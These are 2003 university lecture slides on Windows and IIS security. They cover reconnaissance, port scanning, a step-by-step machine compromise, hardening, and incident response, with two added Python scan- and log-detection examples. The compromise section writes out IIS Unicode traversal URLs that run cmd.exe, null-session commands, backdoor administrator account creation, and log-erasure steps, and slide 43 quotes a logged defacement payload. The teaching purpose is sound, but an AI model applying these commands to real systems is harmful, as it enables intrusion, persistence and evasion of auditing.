Windows Security Analysis Computer Science E-Commerce Security ‘2003’
Slide 1
Windows Security Analysis
Computer Science E-Commerce Security ‘2003’
Matthew Cook
http://escarpment.net/
Slide 2
Introduction
Loughborough University
http://www.lboro.ac.uk/computing/
Bandwidth Management Advisory Service
http://bmas.ja.net/
Slide 3
Windows Security Analysis
Introduction
Step-by-step Machine Compromise
Preventing Attack
Incident Response
Further Reading
Slide 4
Introduction
Basic Security Overview
Slide 5
Physical Security
Secure Location
BIOS restrictions
Password Protection
Boot Devices
Case Locks
Case Panels
Slide 6
Security Threats
Denial of Service
Theft of information
Modification
Fabrication (Spoofing or Masquerading)
Slide 7
Security Threats…
Why a compromise can occur:
Physical Security Holes
Software Security Holes
Incompatible Usage Security Holes
Social Engineering
Complacency
Slide 8
The Easiest Security Improvement
Good passwords
Usernames and Passwords are the primary security defence
Use a password that is easy to type to avoid ‘Shoulder Surfers’
Use the first letters from song titles, song lyrics or film quotations
Slide 9
Can you buy Security?
“This system is secure.” A product vendor might say: “This product makes your network secure.” Or: “We secure e-commerce.” Inevitably, these claims are naïve and simplistic. They look at the security of the product, rather than the security of the system. The first questions to ask are: “Secure from whom?” and “Secure against what?”
Bruce Schneier
Slide 10
Step-by-step Machine Compromise
Why, where, how?
Slide 11
Background
Reasons for Attack:
Personal Issues
Political Statement
Financial Gain (Theft of money, information)
Learning Experience
DoS (Denial of Service)
Support for Illegal Activity
Slide 12
Gathering Information
Companies House
Internet Search
URL: http://www.google.co.uk
Whois
URL: http://www.netsol.com/cgi-bin/whois/whois
A Whois query can provide:
– The Registrant
– The Domain Names Registered
– The Administrative, Technical and Billing Contact
– Record updated and created date stamps
– DNS Servers for the Domain
Slide 13
Gathering Information…
Use Nslookup or dig
dig @<dns server> <machine address>
Different query types available:
– A – Network address
– Any – All or Any Information available
– Mx – Mail exchange records
– Soa – Zone of Authority
– Hinfo – Host information
– Axfr – Zone Transfer
– Txt – Additional strings
Slide 14
Identifying System Weakness
Many products available:
Nmap
Nessus
Pandora
Pwdump
L0pht Crack
Null Authentication
Slide 15
Nmap
Port Scanning Tool
Stealth scanning, OS Fingerprinting
Open Source
Runs under Unix based OS
Port development for Win32
URL: http://www.insure.org/nmap/
Slide 16
Nmap
Slide 17
Nessus
Remote security scanner
Very comprehensive
Frequently updated modules
Testing of DoS attacks
Open Source
Win32 and Java Client
URL: http://nessus.org/
Slide 18
pwdump
Version 3 (e = encrypted)
Developed by Phil Staubs and Erik Hjelmstad
Based on pwdump and pwdump2
URL: http://www.ebiz-tech.com/html/pwdump.html
Needs Administrative Privileges
Extracts hashes even if syskey is installed
Extracts from remote machines
Identifies accounts with no password
Self contained utility
Slide 19
L0pht Crack
Password Auditing and Recovery
Crack Passwords from many sources
Registration $249
URL: http://www.atstake.com/research/lc3/
Slide 20
L0pht Crack
Crack Passwords from:
Local Machine
Remote Machine
SAM File
SMB Sniffer
PWDump file
Slide 21
Nmap Analysis
nmap -sP 158.125.0.0/16 – Ping scan!
nmap -sS 158.125.0.0/16 – Stealth scan
Slide 22
Nmap Analysis…
TCP Connect Scan
Completes a ‘Three Way Handshake’
Very noisy (Detection by IDS)
Slide 23
Nmap Analysis…
TCP SYN Scan
Half open scanning (Full port TCP connection not made)
Less noisy than the TCP Connect Scan
Slide 24
Nmap Analysis…
TCP FIN Scan
– FIN Packet sent to target port
– RST returned for all closed ports
– Mostly works on UNIX based TCP/IP Stacks
TCP Xmas Tree Scan
– Sends a FIN, URG and PUSH packet
– RST returned for all closed ports
TCP Null Scan
– Turns off all flags
– RST returned for all closed ports
UDP Scan
– UDP Packet sent to target port
– “ICMP Port Unreachable” for closed ports
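The flag combinations on slides 22 to 24 are exactly what an IDS keys on. As an added example (not from the slides), the detector below names each TCP probe type from its flag bits and raises an alert only when one source sends the same probe to many distinct ports on a host; the packet tuples and addresses are constructed placeholders.

```python
from collections import defaultdict

# Standard TCP header flag bits (RFC 793), used to recognise the probe types
# the slides list. Added example, not code from the original slides.
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20


def classify_flags(flags: int) -> str:
    """Name the nmap probe type an unsolicited segment with these flags matches."""
    if flags == 0:
        return "null"            # TCP Null scan: every flag turned off
    if flags == FIN:
        return "fin"             # TCP FIN scan
    if flags == FIN | PSH | URG:
        return "xmas"            # TCP Xmas Tree scan: FIN, URG and PUSH set
    if flags == SYN:
        return "syn"             # SYN scan, or simply a normal connection attempt
    return "other"               # mid-stream traffic (ACK, PSH/ACK, SYN/ACK, RST)


def detect_scans(packets, threshold=10):
    """packets: iterable of (src_ip, dst_ip, dst_port, tcp_flags).

    Returns sorted (src_ip, dst_ip, probe_type, distinct_ports) for every
    source that sent the same probe type to at least `threshold` distinct
    ports on one host. Counting distinct ports rather than packets keeps a
    busy but legitimate client sending SYNs to port 80 out of the alerts.
    """
    seen = defaultdict(set)
    for src, dst, dport, flags in packets:
        kind = classify_flags(flags)
        if kind != "other":
            seen[(src, dst, kind)].add(dport)
    return sorted((src, dst, kind, len(ports))
                  for (src, dst, kind), ports in seen.items()
                  if len(ports) >= threshold)


# Constructed sample traffic; the addresses are placeholders, not real hosts.
SAMPLE = (
    [("10.0.0.5", "158.125.1.10", p, FIN | PSH | URG) for p in range(20, 45)]  # Xmas sweep, 25 ports
    + [("10.0.0.9", "158.125.1.10", p, 0) for p in range(1, 9)]               # Null probes, only 8 ports
    + [("10.0.0.7", "158.125.1.10", 80, SYN)] * 50                             # normal web client, one port
    + [("10.0.0.7", "158.125.1.10", 80, PSH | ACK)] * 50
)

if __name__ == "__main__":
    for src, dst, kind, n in detect_scans(SAMPLE):
        print(f"{src} -> {dst}: {kind} scan across {n} ports")
```

Telling a SYN scan from a connect scan needs flow tracking (whether the handshake completes), which the slides note is what makes the connect scan the noisier of the two.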
Slide 25
Null Authentication
Null Authentication:
Net use \\camford\IPC$ “” /u:“”
Famous tools like ‘Red Button’
Net view \\camford
List of Users, groups and shares
Last logged on date
Last password change
Much more…
Slide 26
Exploiting the Security Hole
Using IIS Unicode/Directory Traversal
/scripts/../../winnt/system32/cmd.exe /c+dir
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
Displays the listing of c: in browser
Copy cmd.exe to /scripts/root.exe
Echo upload.asp
GET /scripts/root.exe /c+echo+[blah]>upload.asp
Upload cmdasp.asp using upload.asp
Still vulnerable on 24% of E-Commerce servers
Slide 27
Gaining ‘Root’
Cmdasp.asp provides a cmd shell in the SYSTEM context
Increase in privileges is now simple
ISAPI.dll – RevertToSelf (Horovitz)
Version 2 coded by Foundstone
http://camford/scripts/idq.dll?
Patch Bulletin: MS01-26
NOT included in Windows 2000 SP2
Slide 28
Backdoor Access
Create several user accounts
Net user iisservice <pass> /ADD
Net localgroup administrators iisservice /ADD
Add root shells on high end ports
Tiri is 3Kb in size
Add backdoors to ‘Run’ registry keys
Slide 29
System Alteration
Web page alteration
Information Theft
Enable services
Add VNC
Creating a Warez Server
Net start msftpsvc
Check access
Upload file 1Mb in size
Advertise as a warez server
Slide 30
Audit Trail Removal
Many machines have auditing disabled
Main problems are IIS logs
DoS IIS before logs sync to disc
Erase logs from hard disc
Erasing Eventlog harder
IDS Systems
Network Monitoring at firewall
Slide 31
Preventing Attack
How to stop the attack from happening and how to limit the damage from crackers!
Slide 32
NetBIOS/SMB Services
NetBIOS Browsing Request [UDP 137]
NetBIOS Browsing Response [UDP 138]
NetBIOS Communications [TCP 135]
CIFS [TCP 139, 445 UDP 445]
Port 445 Windows 2000 only
Block ports at firewall
Netstat -A
Slide 33
NetBIOS/SMB Services…
To disable NetBIOS
1. Select ‘Disable NetBIOS’ in the WINS tab of advanced TCP/IP properties.
2. Deselect ‘File and Print sharing’ in the advanced settings of the ‘Network and Dial-up connections’ window
Slide 34
NetBIOS/SMB Services…
Disable Null Authentication
HKLM\SYSTEM\CurrentControlSet\Control\LSA\RestrictAnonymous
REG_DWORD set to 0, 1 or 2!
HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers\RestrictAnonymous
REG_DWORD set to 0 or 1
Slide 35
Operating System Patching
Operating Systems do contain bugs, and patches are a common method of distributing these fixes.
A patch or hot fix usually contains a fix for one discovered bug.
Service packs contain multiple patches or hotfixes. There are well over 200 hotfixes in the soon to be released SP4 for Windows 2000.
Slide 36
Operating System Patching…
Only install patches after you have tested them in a development environment.
Only install patches obtained direct from the vendor.
Install security patches as soon as possible after release.
Install feature patches as and when needed.
Automate patch collection and installation as much as possible (QChain).
Slide 37
Operating System Patching…
Use automated patching technology:
SUS – Microsoft Software Update Service
SMS – Microsoft Systems Management Server
Ghost – Symantec imaging software.
And other application deployment software:
Lights out Distribution
Deferred installation
Slide 38
Baseline Security Analyzer
Freely available from Microsoft
Written by Shavlik Technologies as a direct result of Code Red attacks
A GUI to HFNetChk (v3.81)
Improved feature set
Integrated SUS functionality
Slide 39
Baseline Security Analyzer…
MBSA v1.1 supports the following host OS:
Windows 2000 Professional / Server
Windows XP Home / Professional
Windows .NET not officially supported
Windows NT not supported as host OS
Remote scanning available
Slide 40
Baseline Security Analyzer…
What applications does MBSA scan?
Operating system
Internet Explorer > 5.01
Microsoft Office 2000 and 2002
Media Player > 6.4
Internet Information Services 4.0 and 5.0
SQL Server 7.0 and 2000
Exchange Server 5.5 and 2000
Slide 41
IPSec
IP security
Linux Connectivity using FreeS/WAN
Mainly for wireless use
WEP encryption cracked
URL: http://www.freeswan.org/
URL: http://airsnort.sourceforge.net/
Slide 42
Recent Worms
Sadmind/IIS – Directory Traversal (Unicode Exploit)
CodeRed – ida/idq buffer overflow
CodeGreen – ida/idq buffer overflow
Nimda – Directory Traversal (Unicode Exploit)
Slammer – MS SQL Server transaction control
Slide 43
Sadmind/IIS
2001-05-03 22:34:49 203.67.x.x - 158.125.x.x 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>f***+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>f***+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:[email protected]^</html^>>../wwwroot/default.htm 200 -
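The log entry above, and the request strings on slide 26, are what a defender should be hunting for in IIS W3C logs. As an added example (not from the slides), the checker below percent-decodes each request, first mapping the overlong %c0%af form to the ‘/’ that IIS turned it into, then matches the traversal, cmd.exe/root.exe and /c patterns; the field layout follows the excerpt above and the sample lines are constructed to mirror it.

```python
import re
from urllib.parse import unquote_plus

# Overlong UTF-8 forms of '/' and '\' that IIS 4/5 decoded only after its
# traversal check, so "..%c0%af.." escaped the web root (the slides' Unicode
# exploit). Added example, not code from the original slides.
OVERLONG = {"%c0%af": "/", "%c1%9c": "\\"}

RULES = [
    ("traversal", re.compile(r"\.\./")),              # path climbs out of the web root
    ("cmd-shell", re.compile(r"/(cmd|root)\.exe")),   # shell binary requested over HTTP
    ("command-exec", re.compile(r"(^|\s)/c\s")),      # cmd.exe /c <command> in the query
]


def normalise(uri: str) -> str:
    """Decode a request the way a lax decoder would, so disguised '../'
    sequences and '+'-encoded spaces become visible to the rules."""
    s = uri.lower()
    for enc, char in OVERLONG.items():
        s = s.replace(enc, char)
    return unquote_plus(s).replace("\\", "/")


def parse_iis_line(line: str):
    """Fields of the W3C extended format used in the slide's excerpt:
    date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status"""
    if line.startswith("#"):          # '#Fields:' and other header lines
        return None
    f = line.split()
    if len(f) < 10:
        return None
    return {"client": f[2], "method": f[6], "stem": f[7], "query": f[8], "status": f[9]}


def scan_log(text: str):
    """Return (client, stem, status, findings) for each suspicious request.
    Status 200 means IIS served it: the traversal worked, not just was tried."""
    hits = []
    for line in text.splitlines():
        rec = parse_iis_line(line)
        if rec is None:
            continue
        norm = normalise(rec["stem"] + " " + rec["query"])
        findings = tuple(name for name, rx in RULES if rx.search(norm))
        if findings:
            hits.append((rec["client"], rec["stem"], rec["status"], findings))
    return hits


# Constructed log lines modelled on the Sadmind/IIS entry in the slides
# (client addresses are anonymised placeholders, not real hosts).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status sc-win32-status
2001-05-03 22:34:49 203.67.x.x - 158.125.x.x 80 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200 -
2001-05-03 22:35:10 203.67.x.x - 158.125.x.x 80 GET /scripts/root.exe /c+echo+defaced>../wwwroot/default.htm 200 -
2001-05-03 22:36:02 10.1.1.5 - 158.125.x.x 80 GET /index.asp - 200 -
2001-05-03 22:36:40 10.1.1.6 - 158.125.x.x 80 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 404 -
"""

if __name__ == "__main__":
    for client, stem, status, findings in scan_log(SAMPLE_LOG):
        print(f"{client} {status} {stem} -> {', '.join(findings)}")
```

Matching only on the raw, still-encoded string would miss the %c0%af variant entirely, which is why the decode step comes before the rules.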
Slide 44
IDS Snort
IDS – Intrusion Detection System
Libpcap packet sniffer and logger
Originally developed for the Unix platforms
Open Source
Port to Win32 available (Release 1.8.1)
Installation on Win32 in under 30 minutes
Run on your IIS server or standalone
Slide 45
IDS Snort…
Snort can detect:
Stealth Port Scans
CGI Attacks
Front Page Extensions Attacks
ICMP Activity
SMTP Activity
SQL Activity
SMB Probes
Slide 46
Incident Response
What to do when something does go wrong!
Slide 47
Incident Response…
Don’t Panic!
Unplug the network
Get a notebook
Back-up the system and keep the Back-ups
Restrict use of email
Look for information
Investigate the cause
Request help and assistance.
Slide 48
Incident Response…
Important to return to service swiftly
– Do not jeopardize security
– If in doubt, re-build
– Perform forensics on a backup
Keep documentation and evidence
Contact local CERT if investigation proves non worm/script kiddie activity.
Slide 49
Further Reading
Garfinkel, S. Web Security & Commerce. O’Reilly [ISBN 1-56592-269-7]
Hassler, V. Security Fundamentals for E-Commerce. Artech House [ISBN 1-58053-108-3]
Huth, M R A. Secure Communicating Systems. Cambridge Uni Press [ISBN 0-52180-731-X]
Schneier, B. Secrets & Lies (Digital Security in a Networked World) [ISBN 0-47125-311-1]
Slide 50
Useful Books, Tools and URLs
Securing Windows NT/2000 Servers for the Internet. (Stefan Norberg.)
Incident Response. (Kenneth R. van Wyk, Richard Forno.)
Hacking Exposed: Network Security Secrets & Solutions. (Stuart McClure et al)
Hacking Exposed Windows 2000: Network Security Secrets and Solutions. (Scambray.)
Slide 51
Useful Books, Tools and URLs
Microsoft Security Website
http://www.microsoft.com/security/
Computer Security Incident Response Team
http://www.cert.org/csirts/csirt_faq.html
JANET CERT
http://www.ja.net/cert/
Bugtraq Mailing List
http://online.securityfocus.com/
Slide 52
Questions
Slides available at:
http://escarpment.net/